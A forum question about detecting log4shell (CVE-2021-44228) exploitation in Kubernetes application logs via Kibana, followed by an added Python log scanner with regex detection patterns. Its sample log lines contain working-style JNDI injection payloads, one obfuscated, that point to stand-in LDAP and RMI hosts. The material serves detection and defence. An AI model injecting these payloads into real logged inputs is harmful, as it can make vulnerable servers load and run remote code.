I wonder if any of you have already tried to find possible log4shell exploits based on the logs in your Elastic cluster using Kibana. I am aware that this can be done using Elastic Security as described here: Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog
But for those you must have an Auditbeat or Endgame infrastructure set up, which I do not have, for example.
But I also think there should be a possibility to detect this vulnerability based on the plain application logs (for example collected from a Kubernetes cluster)?
Any ideas on how to achieve this?
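One way to approach the question above, as an added example that is not part of the original post and not Elastic's own detection logic: scan plain application log lines for the log4j lookup syntax that CVE-2021-44228 abuses, before or instead of a Kibana rule. The sample log lines, hostnames and addresses below are constructed for the example; the classifier first looks for a direct `${jndi:` lookup, then collapses the inner `${lower:...}` / `${...:-...}` lookups that log4j expands before the outer one and checks again, and finally flags any remaining nested lookup as worth a look.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample lines, roughly what an application in a Kubernetes pod
# might log (hypothetical addresses and paths; not taken from the original post).
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [11/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '2021-12-11 10:02:00 WARN  app - login failed for user ${${lower:j}ndi:rmi://198.51.100.9/x}',
    '2021-12-11 10:02:30 INFO  app - user alice viewed dashboard ${env:HOME}',
]

# A direct JNDI lookup, case-insensitive and tolerant of stray whitespace.
DIRECT = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Any lookup that contains another lookup: log4j 2.x resolves the inner one
# first, which is how a plain "jndi" substring match gets bypassed.
NESTED = re.compile(r"\$\{[^}]*\$\{")

# Inner lookups that evaluate to a literal; we replace each with that literal.
INNER_LOOKUPS = [
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE),  # ${lower:j} -> j
    re.compile(r"\$\{[^${}]*?:-([^${}]*)\}"),                       # ${foo:-j} / ${::-j} -> j
]


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse inner literal-producing lookups, repeating for nested layers."""
    for _ in range(max_rounds):
        before = text
        for pattern in INNER_LOOKUPS:
            text = pattern.sub(r"\1", text)
        if text == before:
            break
    return text


def classify(line: str) -> Optional[str]:
    """Return a verdict for one log line, or None if nothing looks like a lookup."""
    if DIRECT.search(line):
        return "jndi_lookup"
    if DIRECT.search(normalize(line)):
        return "obfuscated_jndi_lookup"
    if NESTED.search(line):
        return "nested_lookup"
    return None


def scan_logs(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (index, verdict, line) for every line that triggers a verdict."""
    hits = []
    for index, line in enumerate(lines):
        verdict = classify(line)
        if verdict:
            hits.append((index, verdict, line))
    return hits


if __name__ == "__main__":
    for index, verdict, line in scan_logs(SAMPLE_LOGS):
        print(f"line {index}: {verdict}: {line}")
```

The same idea carries over to Kibana: a search such as `message: *jndi*` over the application log index is the crude first pass, and the normalization step above is what that search misses, so a rule on the raw logs should also look for nested `${` inside `${`. Matches show only that a lookup string reached the logger, not that the lookup resolved; correlate with outbound LDAP/RMI connections from the pod to decide whether it was exploitation.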